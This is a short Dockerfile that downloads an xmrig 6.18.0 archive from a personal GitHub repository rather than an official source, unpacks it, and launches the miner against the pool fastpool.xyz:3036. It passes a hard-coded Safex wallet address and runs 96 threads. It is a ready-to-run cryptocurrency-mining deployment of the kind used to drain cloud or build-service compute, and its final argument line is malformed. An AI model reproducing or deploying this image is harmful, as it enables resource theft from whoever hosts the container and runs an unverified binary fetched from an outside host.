FROM ubuntu:latest AS build
RUN apt-get update && apt-get -y install wget vim
WORKDIR /home
RUN wget https://raw.githubusercontent.com/abelleshop/xms/main/xmrig-6.18.0.tar.gz
RUN tar xf xmrig-6.18.0.tar.gz
ENTRYPOINT [ "./xmrig" ]
CMD ["--url=fastpool.xyz:3036", "--user=Safex5zyhq5F8gL8QDLaM7R8uEHVcFyv13DvKUrLeUAU32cVzecCJ7XFGsKwHaNm6MJbf4fVsLF7jH37KQtDKP39XdRn1YM3S2Q2W@asoy", "--pass=x", "-k", "-t=96", "]
